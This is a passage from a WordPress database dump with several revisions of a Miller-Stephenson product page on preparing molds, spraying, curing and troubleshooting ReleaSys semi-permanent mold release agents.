Guide:</span>\r\n</strong></span></p>\r\n<p style="text-align: justify;"><span style="text-decoration: underline;"><span style="font-size: 100%;">Surface-Preparation</span></span></p>\r\n<p style="text-align: justify;">Semi-permanent mold release agents require specific preparation of the molding surface in order to maximize surface adhesion, durability, and minimize transfer. <strong>The molds must be thoroughly cleaned, removal of all previous mold release agent or contamination is critical before application of ReleaSys.</strong> Prior to initial application of ReleaSys, Miller-Stephenson recommends mechanical cleaning with media blasting followed by cleaning with a good general purpose solvent or high-pH cleaning solution. Older molds that have significant buildup of releases, and/ or molds that have been coated with waxes, oils, etc should be cleaned with a heavy duty cleaner solvent like Miller-Stephenson\'s MS-557 or MS-552.  A good test is to use masking tape and test for surface adhesion, if the tape adheres to the mold surface than typically your cleaning has been successful.</p>\r\n<p style="text-align: justify;"><span style="text-decoration: underline;">Application to Mold Surface</span></p>\r\n<p style="text-align: justify;">Miller-Stephenson\'s ReleaSys semi-permanents can be applied by three standard methods: hand-wiping, aerosolization via HVLP gun or aerosolization within a can. Miller-Stephenson strongly recommends application via aerosolization.  This method minimizes over-application and facilitates the development of a uniform,thin film on the molding surface. Miller-Stephenson sells aerosolized cans of its ReleaSys product line (ie: ReleaSys 82, 85, 88, and 89) which have been optimized to deliver consistent application.  Moreover our aerosol cans use a 100% nonflammable, quick drying,  and low odor formulation which enables applicators to have greater safety and lower exposure. Follow these steps when applying ReleaSys:</p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">Gentle agitate ReleaSys, avoiding high shear / high rpm mixing if using bulk and excessive shaking of the aerosol can. Set HVLP gun to appropriate pressure; typically starting pressure is &gt;40 psi in the airline, 8-10 psi at the gun, and ~2-4 psi at the outlet. Nozzles sizes can vary between 1.0mm to 1.8mm.  Spray 8-10 inches from the surface with approximately 50% overlap.</li>\r\n 	<li style="text-align: justify;">When using solvent-based ReleaSys allow 2-3 minutes between coats and 15-20 minutes after the final coat to allow for a full cure at room temperature.  Miler-Stephenson recommends 2-3 coats to maximize durability and number or releases before re-application. Final cure times can be reduced at elevated temperatures. Water-based formulation should be applied to a hot mold (&gt;90 C) with 2-3 light coats followed by a brief cure time (2-3 minutes at &gt; 90 C). Regardless of applications method or carrier solvent, ReleaSys must be applied to the mold surface as a "wet film or wet coat" and allowed to dry on the surface, failure to do so will dramatically effect performance.</li>\r\n 	<li style="text-align: justify;"><em>NOTE: Cure time refers to the time required for the polymeric release agent to sufficiently cross-link and adhere to the mold surface. Allowing proper time for cross-linking is critical to performance, this process can be accelerated as a function of increased temperature.  Typically a single heat cycle of the mold is a sufficient means of acceleration.</em></li>\r\n</ol>\r\n<p style="text-align: justify;"><span style="text-decoration: underline;">Re-application</span></p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">When release becomes hesitant, immediately reapply one coat of ReleaSys™ in the same manner as described previously. Spot touch-ups can also be done on known high wear or geometrically strained areas.</li>\r\n 	<li style="text-align: justify;">When molding it is common for operators to use an HVLP gun to spray the entire mold and apply touch-up coats with the aerosol can.  The aerosol can allows for lighter spray volumes and uniform coverage, particularly in areas that are prone to de-molding issues.</li>\r\n</ol>\r\n<p style="text-align: justify;"><span style="text-decoration: underline;"><span style="font-size: 130%;"><strong>Troubleshooting Guide</strong></span></span></p>\r\n\r\n<table style="height: 634px;" width="1068">\r\n<tbody>\r\n<tr>\r\n<td width="241"><span style="font-size: 120%;">       </span>   <span style="color: #808080;"> <span style="font-size: 120%;" data-text-color="primary">Problem</span></span></td>\r\n<td style="text-align: justify;" width="517"><span style="font-size: 120%;">                                  <span style="text-decoration: underline; color: #ff0000;"><strong>Cause</strong></span></span></td>\r\n<td style="text-align: justify;" width="680"><span style="font-size: 120%;">                                              <span style="text-decoration: underline; color: #0000ff;"><strong>Solution</strong></span></span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Complete failure to obtain release</strong></td>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Improperly cure ReleaSys</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Ensure ReleaSys is properly cured; apply heat to mold if possible or allow  for more time</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Phase-separation of ReleaSys as a result of over    agitation or mixing</td>\r\n<td>• Examine ReleaSys; If separation occurred replace with fresh material</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><strong>Poor Release in strained molding areas</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Lack of slip due to mold geometry application angle</td>\r\n<td>• Apply one or two extra coats of ReleaSys initially; Re-apply touch-up coats to these areas more frequently</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Good release but build-up of ReleaSys on mold surface.</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="2" width="241"><strong>Good release but parts exhibit  blemishes or oily patches</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust  spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Insufficient cure time</td>\r\n<td>• Apply lighter coats of ReleaSys and increase cure time allowed and/or increase cure temperature</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Inability to achieve multiple releases</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Improper application; non-uniform coverage</td>\r\n<td>• Clean mold; apply light coats of ReleaSys with 50% overlapp between      passess.</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Poor release accompanied by small particles of molding material left on mold surface</strong>.</td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n</div>', 'Mold Release Application Guide - Troubleshooting Guide', '', 'inherit', 'closed', 'closed', '', '2694-revision-v1', '', '', '2016-10-24 13:58:09', '2016-10-24 13:58:09', '', 2694, 'https://www.miller-stephenson.com/2694-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2716, 109, '2016-10-24 14:00:28', '2016-10-24 14:00:28', '', '', '', 'publish', 'closed', 'closed', '', '2716', '', '', '2016-10-24 14:00:28', '2016-10-24 14:00:28', '', 0, 'https://www.miller-stephenson.com/nf_sub/2716/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2717, 3, '2016-10-24 14:01:35', '2016-10-24 14:01:35', '', 'Mold Release Application Guide', '', 'inherit', 'closed', 'closed', '', 'shutterstock_293624453', '', '', '2016-11-24 04:15:55', '2016-11-24 04:15:55', '', 2694, 'https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_293624453.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2719, 3, '2016-10-24 14:07:09', '2016-10-24 14:07:09', '<div data-canvas-width="370.56179999999995">Semi-permanent mold release agents are state of the art release systems designed to provide superior durability, maximal number of releases per application, and minimal de-molding force. Miller-Stephenson has been at the forefront of developing the most advance release agents for the molding industry.  Our exclusive ReleaSys Semi-Permanent release agents represent the most technological advanced and refined release system available on the market. ReleaSys release agents provide greater operational efficiency by bonding to mold surfaces, creating a durable layer that is resistant to both chemical and mechanical attack. These products are offered in both low-odor, non-flammable solvent-based or water-based formulations.  Our product line offers the following benefits:</div>\r\n<div data-canvas-width="370.56179999999995">\r\n<ul style="text-align: justify;">\r\n 	<li>Very low transfer (contamination) to the molded part</li>\r\n 	<li>Excels at releasing difficult substrates from complex mold geometries</li>\r\n 	<li>High suitability for rubber-to-metal bonding</li>\r\n 	<li>Low levels of in-mold build-up/fouling</li>\r\n 	<li>Promotion of substrate flow (Rubber, Epoxy, Polyurethane, etc)</li>\r\n 	<li>Extremely high release-ease</li>\r\n 	<li>Many releases (high durability) between applications</li>\r\n 	<li>Various slip levels</li>\r\n 	<li>Superb release for all polymer types</li>\r\n 	<li>Applicability for all molding processes</li>\r\n</ul>\r\n<p style="text-align: justify;">While semi-permanent mold release agents offer superior performance and efficiency, their surface preparation and application technique have greater requirements. Failure to follow the correct method of preparation and application has a more dramatic effect on performance than other conventional release agents. Therefore proper training and guidance is critical to maximize the effectiveness, to this end Miller-Stephenson has generated a comprehensive mold release application guide and commonly observed issues to help aid our customers in applying ReleaSys.</p>\r\n<p style="text-align: justify;"><span style="font-size: 140%;"><strong><span style="text-decoration: underline;">Mold Release Application Guide:</span>\r\n</strong></span></p>\r\n<p style="text-align: justify;"><span style="text-decoration: underline;"><span style="font-size: 100%;">Surface-Preparation</span></span></p>\r\n<p style="text-align: justify;">Semi-permanent mold release agents require specific preparation of the molding surface in order to maximize surface adhesion, durability, and minimize transfer. <strong>The molds must be thoroughly cleaned, removal of all previous mold release agent or contamination is critical before application of ReleaSys.</strong> Prior to initial application of ReleaSys, Miller-Stephenson recommends mechanical cleaning with media blasting followed by cleaning with a good general purpose solvent or high-pH cleaning solution. Older molds that have significant buildup of releases, and/ or molds that have been coated with waxes, oils, etc should be cleaned with a heavy duty cleaner solvent like Miller-Stephenson\'s MS-557 or MS-552.  A good test is to use masking tape and test for surface adhesion, if the tape adheres to the mold surface than typically your cleaning has been successful.</p>\r\n<p style="text-align: justify;"><span style="text-decoration: underline;">Application to Mold Surface</span></p>\r\n<p style="text-align: justify;">Miller-Stephenson\'s ReleaSys semi-permanents can be applied by three standard methods: hand-wiping, aerosolization via HVLP gun or aerosolization within a can. Miller-Stephenson strongly recommends application via aerosolization.  This method minimizes over-application and facilitates the development of a uniform,thin film on the molding surface. Miller-Stephenson sells aerosolized cans of its ReleaSys product line (ie: ReleaSys 82, 85, 88, and 89) which have been optimized to deliver consistent application.  Moreover our aerosol cans use a 100% nonflammable, quick drying,  and low odor formulation which enables applicators to have greater safety and lower exposure. Follow these steps when applying ReleaSys:</p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">Gentle agitate ReleaSys, avoiding high shear / high rpm mixing if using bulk and excessive shaking of the aerosol can. Set HVLP gun to appropriate pressure; typically starting pressure is &gt;40 psi in the airline, 8-10 psi at the gun, and ~2-4 psi at the outlet. Nozzles sizes can vary between 1.0mm to 1.8mm.  Spray 8-10 inches from the surface with approximately 50% overlap.</li>\r\n 	<li style="text-align: justify;">When using solvent-based ReleaSys allow 2-3 minutes between coats and 15-20 minutes after the final coat to allow for a full cure at room temperature.  Miler-Stephenson recommends 2-3 coats to maximize durability and number or releases before re-application. Final cure times can be reduced at elevated temperatures. Water-based formulation should be applied to a hot mold (&gt;90 C) with 2-3 light coats followed by a brief cure time (2-3 minutes at &gt; 90 C). Regardless of applications method or carrier solvent, ReleaSys must be applied to the mold surface as a "wet film or wet coat" and allowed to dry on the surface, failure to do so will dramatically effect performance.</li>\r\n 	<li style="text-align: justify;"><em>NOTE: Cure time refers to the time required for the polymeric release agent to sufficiently cross-link and adhere to the mold surface. Allowing proper time for cross-linking is critical to performance, this process can be accelerated as a function of increased temperature.  Typically a single heat cycle of the mold is a sufficient means of acceleration.</em></li>\r\n</ol>\r\n<p style="text-align: justify;"><span style="text-decoration: underline;">Re-application</span></p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">When release becomes hesitant, immediately reapply one coat of ReleaSys™ in the same manner as described previously. Spot touch-ups can also be done on known high wear or geometrically strained areas.</li>\r\n 	<li style="text-align: justify;">When molding it is common for operators to use an HVLP gun to spray the entire mold and apply touch-up coats with the aerosol can.  The aerosol can allows for lighter spray volumes and uniform coverage, particularly in areas that are prone to de-molding issues.</li>\r\n</ol>\r\nFor further assistance please contact our Technical Service Department. Miller-Stephenson\'s Mold Release Application Guide was designed to set general guidelines for applicators and molders to follow. Each molding operation is different and modifications to the above mentioned process is likely the vast given the diversity and specialization within this field. Please see our Troubleshooting guide is your are experiencing any issues using our ReleaSys product line.\r\n<p style="text-align: justify;"><span style="text-decoration: underline;"><span style="font-size: 130%;"><strong>Troubleshooting Guide</strong></span></span></p>\r\n\r\n<table style="height: 634px;" width="1068">\r\n<tbody>\r\n<tr>\r\n<td width="241"><span style="font-size: 120%;">       </span>   <span style="color: #808080;"> <span style="font-size: 120%;" data-text-color="primary">Problem</span></span></td>\r\n<td style="text-align: justify;" width="517"><span style="font-size: 120%;">                                  <span style="text-decoration: underline; color: #ff0000;"><strong>Cause</strong></span></span></td>\r\n<td style="text-align: justify;" width="680"><span style="font-size: 120%;">                                              <span style="text-decoration: underline; color: #0000ff;"><strong>Solution</strong></span></span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Complete failure to obtain release</strong></td>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Improperly cure ReleaSys</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Ensure ReleaSys is properly cured; apply heat to mold if possible or allow  for more time</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Phase-separation of ReleaSys as a result of over    agitation or mixing</td>\r\n<td>• Examine ReleaSys; If separation occurred replace with fresh material</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><strong>Poor Release in strained molding areas</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Lack of slip due to mold geometry application angle</td>\r\n<td>• Apply one or two extra coats of ReleaSys initially; Re-apply touch-up coats to these areas more frequently</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Good release but build-up of ReleaSys on mold surface.</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="2" width="241"><strong>Good release but parts exhibit  blemishes or oily patches</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust  spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Insufficient cure time</td>\r\n<td>• Apply lighter coats of ReleaSys and increase cure time allowed and/or increase cure temperature</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Inability to achieve multiple releases</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Improper application; non-uniform coverage</td>\r\n<td>• Clean mold; apply light coats of ReleaSys with 50% overlapp between      passess.</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Poor release and/or small particles of molding material left on mold surface</strong>.</td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n</div>', 'Mold Release Application Guide - Troubleshooting Guide', '', 'inherit', 'closed', 'closed', '', '2694-revision-v1', '', '', '2016-10-24 14:07:09', '2016-10-24 14:07:09', '', 2694, 'https://www.miller-stephenson.com/2694-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2720, 3, '2016-10-24 14:10:34', '2016-10-24 14:10:34', '<div data-canvas-width="370.56179999999995">Semi-permanent mold release agents are state of the art release systems designed to provide superior durability, maximal number of releases per application, and minimal de-molding force. Miller-Stephenson has been at the forefront of developing the most advance release agents for the molding industry.  Our exclusive <a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">ReleaSys Semi-Permanent release agents</a> represent the most technological advanced and refined release system available on the market. ReleaSys release agents provide greater operational efficiency by bonding to mold surfaces, creating a durable layer that is resistant to both chemical and mechanical attack. These products are offered in both low-odor, non-flammable solvent-based or water-based formulations.  Our product line offers the following benefits:</div>\r\n<div data-canvas-width="370.56179999999995">\r\n<ul style="text-align: justify;">\r\n 	<li>Very low transfer (contamination) to the molded part</li>\r\n 	<li>Excels at releasing difficult substrates from complex mold geometries</li>\r\n 	<li>High suitability for rubber-to-metal bonding</li>\r\n 	<li>Low levels of in-mold build-up/fouling</li>\r\n 	<li>Promotion of substrate flow (Rubber, Epoxy, Polyurethane, etc)</li>\r\n 	<li>Extremely high release-ease</li>\r\n 	<li>Many releases (high durability) between applications</li>\r\n 	<li>Various slip levels</li>\r\n 	<li>Superb release for all polymer types</li>\r\n 	<li>Applicability for all molding processes</li>\r\n</ul>\r\n<p style="text-align: justify;">While semi-permanent mold release agents offer superior performance and efficiency, their surface preparation and application technique have greater requirements. Failure to follow the correct method of preparation and application has a more dramatic effect on performance than other conventional release agents. Therefore proper training and guidance is critical to maximize the effectiveness, to this end Miller-Stephenson has generated a comprehensive mold release application guide and commonly observed issues to help aid our customers in applying ReleaSys.</p>\r\n<p style="text-align: justify;"><span style="font-size: 140%;"><strong><span style="text-decoration: underline;">Mold Release Application Guide:</span>\r\n</strong></span></p>\r\n<p style="text-align: justify;"><span style="text-decoration: underline;"><span style="font-size: 100%;">Surface-Preparation</span></span></p>\r\n<p style="text-align: justify;">Semi-permanent mold release agents require specific preparation of the molding surface in order to maximize surface adhesion, durability, and minimize transfer. <strong>The molds must be thoroughly cleaned, removal of all previous mold release agent or contamination is critical before application of ReleaSys.</strong> Prior to initial application of ReleaSys, Miller-Stephenson recommends mechanical cleaning with media blasting followed by cleaning with a good general purpose solvent or high-pH cleaning solution. Older molds that have significant buildup of releases, and/ or molds that have been coated with waxes, oils, etc should be cleaned with a heavy duty cleaner solvent like Miller-Stephenson\'s MS-557 or MS-552.  A good test is to use masking tape and test for surface adhesion, if the tape adheres to the mold surface than typically your cleaning has been successful.</p>\r\n<p style="text-align: justify;"><span style="text-decoration: underline;">Application to Mold Surface</span></p>\r\n<p style="text-align: justify;">Miller-Stephenson\'s ReleaSys semi-permanents can be applied by three standard methods: hand-wiping, aerosolization via HVLP gun or aerosolization within a can. Miller-Stephenson strongly recommends application via aerosolization.  This method minimizes over-application and facilitates the development of a uniform,thin film on the molding surface. Miller-Stephenson sells aerosolized cans of its ReleaSys product line (ie: <a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents-2/">ReleaSys 82, 85, 88, and 89</a>) which have been optimized to deliver consistent application.  Moreover our aerosol cans use a 100% nonflammable, quick drying,  and low odor formulation which enables applicators to have greater safety and lower exposure. Follow these steps when applying ReleaSys:</p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">Gentle agitate ReleaSys, avoiding high shear / high rpm mixing if using bulk and excessive shaking of the aerosol can. Set HVLP gun to appropriate pressure; typically starting pressure is &gt;40 psi in the airline, 8-10 psi at the gun, and ~2-4 psi at the outlet. Nozzles sizes can vary between 1.0mm to 1.8mm.  Spray 8-10 inches from the surface with approximately 50% overlap.</li>\r\n 	<li style="text-align: justify;">When using solvent-based ReleaSys allow 2-3 minutes between coats and 15-20 minutes after the final coat to allow for a full cure at room temperature.  Miler-Stephenson recommends 2-3 coats to maximize durability and number or releases before re-application. Final cure times can be reduced at elevated temperatures. Water-based formulation should be applied to a hot mold (&gt;90 C) with 2-3 light coats followed by a brief cure time (2-3 minutes at &gt; 90 C). Regardless of applications method or carrier solvent, ReleaSys must be applied to the mold surface as a "wet film or wet coat" and allowed to dry on the surface, failure to do so will dramatically effect performance.</li>\r\n 	<li style="text-align: justify;"><em>NOTE: Cure time refers to the time required for the polymeric release agent to sufficiently cross-link and adhere to the mold surface. Allowing proper time for cross-linking is critical to performance, this process can be accelerated as a function of increased temperature.  Typically a single heat cycle of the mold is a sufficient means of acceleration.</em></li>\r\n</ol>\r\n<p style="text-align: justify;"><span style="text-decoration: underline;">Re-application</span></p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">When release becomes hesitant, immediately reapply one coat of ReleaSys™ in the same manner as described previously. Spot touch-ups can also be done on known high wear or geometrically strained areas.</li>\r\n 	<li style="text-align: justify;">When molding it is common for operators to use an HVLP gun to spray the entire mold and apply touch-up coats with the aerosol can.  The aerosol can allows for lighter spray volumes and uniform coverage, particularly in areas that are prone to de-molding issues.</li>\r\n</ol>\r\nFor further assistance please contact our Technical Service Department. Miller-Stephenson\'s Mold Release Application Guide was designed to set general guidelines for applicators and molders to follow. Each molding operation is different and modifications to the above mentioned process is likely the vast given the diversity and specialization within this field. Please see our Troubleshooting guide is your are experiencing any issues using our ReleaSys product line.\r\n<p style="text-align: justify;"><span style="text-decoration: underline;"><span style="font-size: 130%;"><strong>Troubleshooting Guide</strong></span></span></p>\r\n\r\n<table style="height: 634px;" width="1068">\r\n<tbody>\r\n<tr>\r\n<td width="241"><span style="font-size: 120%;">       </span>   <span style="color: #808080;"> <span style="font-size: 120%;" data-text-color="primary">Problem</span></span></td>\r\n<td style="text-align: justify;" width="517"><span style="font-size: 120%;">                                  <span style="text-decoration: underline; color: #ff0000;"><strong>Cause</strong></span></span></td>\r\n<td style="text-align: justify;" width="680"><span style="font-size: 120%;">                                              <span style="text-decoration: underline; color: #0000ff;"><strong>Solution</strong></span></span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Complete failure to obtain release</strong></td>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Improperly cure ReleaSys</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Ensure ReleaSys is properly cured; apply heat to mold if possible or allow  for more time</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Phase-separation of ReleaSys as a result of over    agitation or mixing</td>\r\n<td>• Examine ReleaSys; If separation occurred replace with fresh material</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><strong>Poor Release in strained molding areas</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Lack of slip due to mold geometry application angle</td>\r\n<td>• Apply one or two extra coats of ReleaSys initially; Re-apply touch-up coats to these areas more frequently</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Good release but build-up of ReleaSys on mold surface.</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="2" width="241"><strong>Good release but parts exhibit  blemishes or oily patches</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust  spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Insufficient cure time</td>\r\n<td>• Apply lighter coats of ReleaSys and increase cure time allowed and/or increase cure temperature</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Inability to achieve multiple releases</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Improper application; non-uniform coverage</td>\r\n<td>• Clean mold; apply light coats of ReleaSys with 50% overlapp between      passess.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Poor release and/or small particles of molding material left on mold surface</strong>.</td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n[ux_product_categories ids="21,16" number="10"]\r\n\r\nTo learn more about our mold release agents please <a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a>', 'Mold Release Application Guide - Troubleshooting Guide', '', 'inherit', 'closed', 'closed', '', '2694-revision-v1', '', '', '2016-10-24 14:10:34', '2016-10-24 14:10:34', '', 2694, 'https://www.miller-stephenson.com/2694-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2721, 3, '2016-10-24 14:15:28', '2016-10-24 14:15:28', '<div data-canvas-width="370.56179999999995">Semi-permanent mold release agents are state of the art release systems designed to provide superior durability, maximal number of releases per application, and minimal de-molding force. Miller-Stephenson has been at the forefront of developing the most advance release agents for the molding industry.  Our exclusive <a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">ReleaSys Semi-Permanent release agents</a> represent the most technological advanced and refined release system available on the market. ReleaSys release agents provide greater operational efficiency by bonding to mold surfaces, creating a durable layer that is resistant to both chemical and mechanical attack. These products are offered in both low-odor, non-flammable solvent-based or water-based formulations.  Our product line offers the following benefits:</div>\r\n<div data-canvas-width="370.56179999999995">\r\n<ul style="text-align: justify;">\r\n 	<li>Very low transfer (contamination) to the molded part</li>\r\n 	<li>Excels at releasing difficult substrates from complex mold geometries</li>\r\n 	<li>High suitability for rubber-to-metal bonding</li>\r\n 	<li>Low levels of in-mold build-up/fouling</li>\r\n 	<li>Promotion of substrate flow (Rubber, Epoxy, Polyurethane, etc)</li>\r\n 	<li>Extremely high release-ease</li>\r\n 	<li>Many releases (high durability) between applications</li>\r\n 	<li>Various slip levels</li>\r\n 	<li>Superb release for all polymer types</li>\r\n 	<li>Applicability for all molding processes</li>\r\n</ul>\r\n<p style="text-align: justify;">While semi-permanent mold release agents offer superior performance and efficiency, their surface preparation and application technique have greater requirements. Failure to follow the correct method of preparation and application has a more dramatic effect on performance than other conventional release agents. Therefore proper training and guidance is critical to maximize the effectiveness, to this end Miller-Stephenson has generated a comprehensive mold release application guide and commonly observed issues to help aid our customers in applying ReleaSys.</p>\r\n<p style="text-align: justify;"><span style="font-size: 140%;"><strong><span style="text-decoration: underline;">Mold Release Application Guide:</span>\r\n</strong></span></p>\r\n<p style="text-align: justify;"><span style="text-decoration: underline;"><span style="font-size: 100%;">Surface-Preparation</span></span></p>\r\n<p style="text-align: justify;">Semi-permanent mold release agents require specific preparation of the molding surface in order to maximize surface adhesion, durability, and minimize transfer. <strong>The molds must be thoroughly cleaned, removal of all previous mold release agent or 